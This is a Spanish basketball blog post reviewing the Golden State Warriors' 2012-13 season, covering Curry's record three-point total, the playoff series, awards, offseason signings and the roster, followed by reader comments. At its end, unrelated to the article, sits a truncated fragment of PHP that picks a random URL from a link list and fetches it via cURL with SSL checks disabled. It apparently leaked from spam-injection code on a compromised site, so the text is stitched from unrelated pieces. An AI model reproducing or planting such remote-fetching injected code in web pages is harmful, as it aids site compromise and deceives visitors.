Golden State Warriors: Sobresaliente

14 de July de 2013 por Sancho88

curry oracleImpecable la temporada de los chicos de la bahía. Después de 5 años de sequía, los Warriors volvieron a disfrutar del ‘We Believe’ que entonaron en 2007 aupados por Baron Davis, Monta Ellis, Jason Richardson, Stephen Jackson y Andris Biedrins. A día de hoy, y tras la salida de Biedrins a Utah Jazz, nada queda de aquellos Warriors, pero la realidad que han construido los nuevos dueños y Mark Jackson desde el banquillo ha permitido a los aficionados del Oracle Arena volver a disfrutar de un equipo divertido y eficaz. Así, la grada se ha sentido de nuevo unida con el equipo, entonando el nuevo lema ‘We Belong’. Liderados por un Stephen Curry al que por fin le respetaron las lesiones, los Warriors superaron cualquier pronóstico. Ni los más optimistas del lugar podían esperar verlos en semifinales de conferencia y poniendo en serios apuros a los Spurs en los primeros 4 partidos.

Para llegar hasta allí tuvieron que superar el escepticismo general en torno a su principal figura, Stephen Curry, y al líder defensivo del equipo, Andrew Bogut. Ya apuntamos en el análisis previo que el resultado de los Warriors estaría condicionado por el estado de salud de su base y su pívot titulares. Ambos superaron con bastante éxito sus lesiones de tobillo y completaron una temporada muy exitosa a nivel colectivo. Curry, porque se convirtió en el máximo triplista en una temporada en la historia de la NBA, superando a la leyenda Ray Allen, y Bogut, porque por fin pudo disfrutar de la sensación de volver a sentirse jugador de baloncesto tras un año en el ‘dique seco’, y a pesar de disputar tan solo 32 partidos en temporada regular, los Playoffs contaron con su sello de calidad, una firma que no podrán olvidar fácilmente los Nuggets. Tampoco lo olvidarán los mismos aficionados que silbaron el año pasado a Joe Lacob por el traspaso de Monta Ellis, puesto que Bogut ha resultado más eficaz a la postre.

El resto del equipo vino a confirmar que el proyecto era sólido y sólo le faltaba la salud de Curry y Bogut. David Lee, el líder estadístico de estos Warriors, disputó por primera vez en su carrera el partido de las estrellas (desde Sprewell en el 96 ningún guerrero lo había hecho). A sus 30 años, Lee ha recibido por fin el reconocimiento a una carrera de esfuerzo y superación constante. Lástima su lesión de cadera justo antes de los Playoffs. A pesar de ella, Lee fue un guerrero mayúsculo en las eliminatorias contra Nuggets y Spurs, y en los escasos minutos que disputó fue el señuelo de los Warriors y levantó el ánimo y el espíritu de un equipo que puso ‘patas arriba’ el ‘establishment’ de la Conferencia Oeste. El mensaje era claro para todos sus compañeros: no podían rendirse.

Y ninguno lo hizo. En cuartos de final machacaron en 6 partidos al alumno modelo de la temporada regular: los Nuggets del COY George Karl (volvió a cumplirse la maldición de la primera ronda con el mejor entrenador del año). Gracias a un esfuerzo colectivo plausible liderado por Curry y bien arropado por la labor defensiva de Bogut, el gran papel que jugó como combo ‘3-4’ Harrison Barnes y la efectividad de Jarret Jack desde el banquillo, los de Oakland pudieron olvidar la lesión de Lee y pasaron a segunda ronda contra todo pronóstico dejando las mejores sensaciones entre los aficionados de la NBA. Consiguieron no dejar indiferente a nadie, vibramos con ellos, fueron el ‘efecto Lin’ del año pasado pero en versión colectiva. Para siempre quedarán en el recuerdo los terceros cuartos surrealistas de Stephen Curry, donde encendía pasiones y emitía magia.

klayNo obstante, el sueño se esfumó contra los campeones del Oeste. San Antonio fue el hueso duro que paró a un equipo mermado por las lesiones. Las dos prórrogas del primer partido se resolvieron gracias a sendos triples de Green para empatar al final del partido, y Ginobili para ganar en la segunda prórroga. De nada valieron los 44 puntos, 6 rebotes y 11 asistencias de Curry. Pero los Warriors no se iban a rendir tan fácilmente. Con un Klay Thompson desatado (34-14), consiguieron apretar las tuercas en El Álamo. La serie viajó a California y salió de allí empatada 2-2 por la inercia ganadora de Curry y la ayuda inestimable de Jack y Barnes. Hasta ahí llegaron los Warriors. Curry volvió a crujir en el cuarto partido y sus tobillos marcaron el final de la temporada para los Warriors. La estrategia de Popovich y el juego en equipo de Spurs acabaron por matar en seis partidos a un equipo que tuvo la opción de forzar el séptimo, pero mentalmente no podían más. Con un líder infiltrado (Curry) y otro líder al 10% quizá (Lee), los Duncan, Parker, Leonard, etc., se hicieron eternos para los Warriors. Y los jóvenes de la bahía también se hicieron eternos para todos los aficionados. Sobresaliente como premio a un temporadón de B-A-L-O-N-C-E-S-T-O.

PREMIOS

MVP: Stephen Curry. Sin ninguna duda, Curry es la magia, la imaginación, el genio puro de este equipo. Sin él, quizá los Warriors se habrían quedado en pura anécdota del Oeste, en un equipo bueno sin más del que seguramente diríamos que le falta un jugador determinante. Pero a partir de ahora, y si sus tobillos se lo permiten, tenemos All-Star para rato (sí o sí el año que viene). Curry anotó 272 triples en temporada regular (record histórico), 3 más que Ray Allen en la temporada 2005/2006, y fue un jugador sublime en Playoffs. Nadie sabe qué habría pasado si David Lee hubiera estado sano en postemporada. La que habrían liado entre los dos podría haber sido de dimensiones cósmicas.

barnes nuggetsRookie: Harrison Barnes. Magistral su lección de baloncesto en Playoffs. Su físico es inmejorable, y sus cualidades no tienen techo aparente. Su gran impacto en las dos eliminatorias contra Nuggets y Spurs nos dibujan el inicio de una carrera brillante. Queremos seguir viéndole desarrollar su juego en el poste. Es imposible no ver ciertas semejanzas entre este chico y James Worthy. Una vez más, ‘La Fábrica’ de North Carolina nos saca del horno a un alero de calidad suprema que se crece en los Playoffs. También tuvieron un gran impacto el resto de rookies. Festus Ezeli se ganó un lugar en el corazón de todos los aficionados amarillos gracias a su gran esfuerzo defensivo (si aprende a jugar en ataque puede ser un pívot de referencia en la liga), Draymond Green hizo lo mismo en el puesto de ala-pívot, y hasta Kent Bazemore tuvo tiempo de lucirse con una bandeja ‘game winner’ contra los Spurs en el primer partido de la serie (que finalmente se decidió a favor de los Spurs gracias al triple de Ginobili). Ojo clínico de Bob Myers en los despachos y resultados impecables en la cancha. Estos 4 jugadores son ya el presente de la franquicia, aunque la lesión de rodilla de Ezeli le privará de jugar al menos hasta finales de año en el mejor de los casos.

Sorpresa: Klay Thompson. Hizo olvidar a Monta Ellis desde el segundo 1, se consolidó como titular en el puesto de escolta tras la lesión de Brandon Rush y fue el principal francotirador del equipo tras Curry. Juntos formaron la mejor pareja de tiradores de 3 de toda la historia de la liga. Klay Thompson ha madurado en su juego defensivo y ofensivo, y a pesar de seguir siendo un jugador inconstante, su progresión esta temporada ha sido magnifica. Desde ya es uno de los mejores escoltas jóvenes de toda la liga. Está por ver su rol en el equipo con la llegada de Iguodala. Podría salir desde el banquillo y aspirar el premio de mejor sexto hombre la próxima temporada.

Decepción: Richard Jefferson y Andris Biedrins. En realidad no decepcionaron a nadie, sabíamos que no iban a hacer nada a cambio de su multimillonario contrato. Era sólo por poner algo aquí. Fue una temporada tan brillante en todos los aspectos que no dio tiempo ni de meternos con estos dos señores.

Esfuerzo en vano: También debemos dejar huérfano este premio, pues en relación a las aspiraciones iniciales del equipo se podría decir que los Warriors han superado todos los pronósticos, por lo que nadie se esforzó en vano, sino que todos sumaron para lograr ese gran resultado de semifinales de conferencia. En cualquier caso, el 44-6-11 con el que salió Curry del Álamo en el decisivo primer partido de la serie contra Spurs podría calificarse de mayor esfuerzo en vano de toda la temporada. Quién sabe que habría pasado con un 0-2 y el Oracle a reventar en el tercer y cuarto partido de la serie.

JUGANDO A GM

En otras franquicias dan ganas de ponerse a aplicar amnistías, ‘buyouts’, rescisiones de contratos, despidos, de todo. Pero uno ve la organización y la coherencia con la que se han armado estos Warriors desde la salida de Monta Ellis y es muy difícil, por no decir imposible, mejorar el resultado actual en los despachos. La reciente llegada de Andre Iguodala es el gran ‘bombazo’ de los movimientos en la agencia libre tras el fichaje de Howard por los Rockets. En ese traspaso los Warriors también han logrado sacarse de encima los expirings intraspasables de Biedrins y Jefferson, que viajan a Utah junto al también expiring de Brandon Rush, las primeras rondas de 2014 y 2017 y las segundas rondas de 2016 y 2017 (éstas, a cambio del escolta Kevin Murphy). Un movimiento que muchos intuyeron era previo a un intercambio de Barnes + Bogut a cambio del sign & trade de Howard con los Lakers, pero que finalmente se quedó ahí.

gswDe esta forma, los Warriors se aseguran el mejor juego de aleros de la liga con Thompson, Iguodala y Barnes, que pueden rotarse entre ellos en las posiciones de ‘2’ y de ‘3’ o jugar un ‘small ball’ con Barnes de ‘4’ y Lee de ‘5’ cuando Bogut esté fuera por lesión. Con los 24 millones liberados a través de Jefferson, Biedrins y Rush, el equipo se asegura también un desahogo económico y evita pagar el impuesto de lujo. No obstante, por poner una pega a la gestión de Myers, muchos echarán de menos el año que viene a Jarret Jack y Carl Landry, que salieron a la agencia libre para asegurarse dos buenos contratos multianuales. Y los consiguieron en Cleveland y Sacramento, respectivamente.

Así, para arropar al núcleo duro formado por Curry, Thompson, Iguodala, Barnes, Lee y Bogut, los Warriors han empezado a moverse. Y lo están haciendo de vicio. Toney Douglas llega desde los Kings para ser el base suplente de Curry. No es Jack, obviamente, pero los Warriors le han firmado un contrato por el mínimo (1,6 millones) para la próxima temporada. El movimiento tiene sentido, ya que aunque Douglas no organiza nada como base, su defensa y capacidad de tiro están fuera de toda duda, y ya sabemos que a Mark Jackson le encanta jugar con dos bases a la vez, por lo que Douglas puede desempeñar el papel de ‘2’ que jugó Jack durante el año pasado o de ‘1’ suplente. A la sombra de Curry y Douglas, jugadores como Nedovic (escogido en el puesto 31 del draft) o Machado pueden dar el salto de calidad en cualquier momento y postularse como los herederos del Imperio Curry, o, al menos, ser sus ayudantes.

Además, con la lesión de Ezeli y el siempre renqueante estado de salud de Bogut, los Warriors también han firmado a Marreese Speights por 3 temporadas y al pívot de los Suns Jermaine O’Neal por una, además de Dwayne Jones, que debe ganarse un puesto en la plantilla en Las Vegas. Por tanto, no deberían notar en absoluto la marcha de Carl Landry. Todos estos movimientos añaden defensa desde el banquillo, algo que están potenciando muchísimo estos Warriors. No sabemos si queda algo por hacer, seguramente sí, como por ejemplo asegurarle un contrato garantizado a Dwayne Jones y Kevin Murphy (dependerá de su rendimiento en Las Vegas), pero los movimientos de estos Warriors son jugadas maestras y si su campaña ha sido de sobresaliente, la del año que viene se perfila en pos del campeonato.

El equipo queda así (no hay que tocar nada)

Bases: Stephen Curry, Toney Douglas, Nemanja Nedovic, Scott Machado

Escoltas: Klay Thompson, Kent Bazemore, Kevin Murphy

Aleros: Andre Iguodala, Harrison Barnes, Draymond Green

Ala-Pívots: David Lee, Marreese Speights, Dwayne Jones

Pívots: Andrew Bogut, Festus Ezeli, Jermaine O’Neal

Comenta

9 comentarios a esta entrada

  1. Vader dice:
    #1

    Gran temporada!! Envidia sana de gestión que han hecho en la bahía…

    Saludos

      Citar

  2. oli dice:
    #2

    Vi muchos partidos la temporada pasada y si un equipo me hizo me disfrutar fueron estos warriors y no sólo en playoffs, en temporada regular contra Lakers hubo varios partidos espectaculares, yo los voy a apoyar desde el primer partido porque me encanta como juegan y espero que puedan llegar más lejos esta temporada!!

      Citar

  3. M dice:
    #3

    Curry, te amamos 🙂

      Citar

  4. Ruxixón dice:
    #4

    M:
    Curry, te amamos

    +1

    Una delicia verlo jugar,otros bases serán muy buenos pero el que más me transmite es esa muñequita linda de Curry.

      Citar

  5. Lucho dice:
    #5

    Ruxixón: +1

    Una delicia verlo jugar,otros bases serán muy buenos pero el que más me transmite es esa muñequita linda de Curry.

    + 2

      Citar

  6. Denise dice:
    #6

    Sigo sin enterarme como los Warriors han conseguido enviar toda la morralla al rookie sin recibir nada a cambio (el rookie no cuenta jaja).
    Por lo demas, en el roster sobra uno, probablemente el Dios del Blog, Machado se quede fuera.

      Citar

  7. Denise dice:
    #7

    Denise:
    Sigo sin enterarme como los Warriors han conseguido enviar toda la morralla al rookie sin recibir nada a cambio (el rookie no cuenta jaja).

    Buff que mal me he expresado, queria decir enviarle toda la morralla a Utah recibiendo solo el misero contrato de un rookie.

      Citar

  8. Heineken dice:
    #8

    Por que al final fue un negocio a tres bandas.

    Warriors mandó a todos esos paquetes a Utah, generando una trade exception de 24 M con la que hicieron un S&T con Iguodala para que firmase con ellos. Parte de esa trade exception fue a Denver y la usaron en un S&T por Randy Foye de Utah.
    De forma que quedan 1 trade exception dividida en dos partes: una en Utah y otra en Warriors. (Creo que por valor de 4-5 Millones cada una).

    Usaron este método porque las trade exception solo pueden usarse en traspaso, no en fichar agentes libres.

      Citar

  9. Denise dice:
    #9

    Heineken: Por que al final fue un negocio a tres bandas.Warriors mandó a todos esos paquetes a Utah, generando una trade exception de 24 M con la que hicieron un S&T con Iguodala para que firmase con ellos. Parte de esa trade exception fue a Denver y la usaron en un S&T por Randy Foye de Utah.De forma que quedan 1 trade exception dividida en dos partes: una en Utah y otra en Warriors. (Creo que por valor de 4-5 Millones cada una).Usaron este método porque las trade exception solo pueden usarse en traspaso, no en fichar agentes libres.

    OK, gracias, negociazo para los Warriors y para mí candidatos como mínimo a finalistas en el Oeste

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>